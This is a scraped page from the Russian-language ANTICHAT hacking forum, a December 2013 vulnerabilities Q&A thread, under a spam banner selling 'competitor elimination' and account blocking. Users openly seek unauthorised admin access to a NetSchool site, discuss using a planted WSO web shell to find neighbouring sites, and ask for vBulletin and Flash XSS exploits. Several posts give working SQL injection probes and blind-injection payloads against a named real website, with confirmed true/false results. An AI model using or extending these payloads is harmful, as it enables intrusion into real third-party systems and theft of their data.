УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2312 из 2438

2312

Опции темы

Поиск в этой теме

Опции просмотра

#23111

22.12.2013, 09:59

Stronger

Guest

Сообщений: n/a

Провел на форуме:
20657

Репутация: 2

Цитата:

Сообщение от None

написать тебе бажный скрипт ?

этот вопрос с сарказмом?)

Вообщем,существует сайт с движком NetSchool (4.50 версия). Мне нужно зайти с админского аккаунта. есть какие нибудь уязвимости,и,если можно,написать поподробнее о них.

#23112

22.12.2013, 16:02

BOSS

Новичок

Регистрация: 15.06.2010

Сообщений: 0

Провел на форуме:
16546

Репутация: 0

При использовании WSO шелла, иногда можно опуститься на каталог ниже и увидеть соседние сайты на сервере. Иногда папка имеет название site.com, и тогда я могу просто скопировать название и перейти на сайт, но иногда название не совпадает с доменом. Как узнать точный домен?

#23113

22.12.2013, 23:34

kingbeef

Новичок

Регистрация: 08.04.2010

Сообщений: 1

Провел на форуме:
70640

Репутация: 0

Цитата:

Сообщение от BOSS

BOSS said:
При использовании WSO шелла, иногда можно опуститься на каталог ниже и увидеть соседние сайты на сервере. Иногда папка имеет название site.com, и тогда я могу просто скопировать название и перейти на сайт, но иногда название не совпадает с доменом. Как узнать точный домен?

Как вариант посмотреть все домены на ip и сверить название папки с названием сайта.

#23114

23.12.2013, 01:59

BOSS

Новичок

Регистрация: 15.06.2010

Сообщений: 0

Провел на форуме:
16546

Репутация: 0

Цитата:

Сообщение от kingbeef

kingbeef said:
Как вариант посмотреть все домены на ip и сверить название папки с названием сайта.

Как их посмотреть? Где?

#23115

23.12.2013, 06:39

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от BOSS

BOSS said:
Как их посмотреть? Где?

немного поможет разобраться:

https://forum.antichat.net/thread397144.html

#23116

24.12.2013, 20:46

MrKloud

Guest

Сообщений: n/a

Провел на форуме:
1743

Репутация: 0

Помогите найти что нибудь для vbulletin 3.8.7 pl3. Про сплойт через EggAvatar - знаю, а кроме этого ничего не нашёл.

#23117

25.12.2013, 07:43

warmup

Новичок

Регистрация: 03.04.2010

Сообщений: 1

Провел на форуме:
18657

Репутация: 0

Подскажите, кто знает. Есть онлайн проект на флеше. Нашел форму которая разрешает загрузку и вывод флеш контента пользователю. (как пример - личные сообщения пропускают и показывают всю флешку). С ActionScript знаком совсем мало. Можно сказать - вообще не знаком

Дайте пару советов, если можно с примерами хотя-бы алерта (если это возможно вообще в AS). Можно в ЛС, у кого спортивный интерес) (в проекте более миллиона участников).

#23118

25.12.2013, 19:14

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

Быть может, у кого появятся какие идеи как реализовать.

Валидное условие:

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+order+by+1--+

Валидное условие:

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=1--+

Невалидное условие:

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=0--+

Неполучилось провести объединение через union, ни через blind конструкции.

условие

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' or 5=find_in_set(substring((SELECT version()),1,1),'1,1,2,3,4,5')--+ не срабатывает, не срабатывает даже substring в чистом варианте виде +or+5=substring(version(),1,1)--+

Если не трудно, то в личку если есть конкретные варианты. С меня бонус

P.S. Походу где-то рубиться запятая не давая использовать функции соотв

#23119

25.12.2013, 22:18

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+and+1=1+and+ substring((@@version)+from+1+for+1)=4+--+ FALSE

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+and+1=1+and+ substring((@@version)+from+1+for+1)=5+--+ TRUE

#23120

25.12.2013, 23:56

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Покрутил в сторону join(), но адекватного вывода не нашел((

Цитата:

Сообщение от None

http://videos.webpronews.com/video/playlist.php?movie_name=-ses_jcolborn'+and+1=1+union+(select+*+from+(select +1)+a1+join(select+2)+a2+join(select+3)+a3+)+--+

пока что как вариант написать сплоит под блинд, завтра если будет возможность еще покручу, скуль интересная)

Страница 2312 из 2438

2312

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход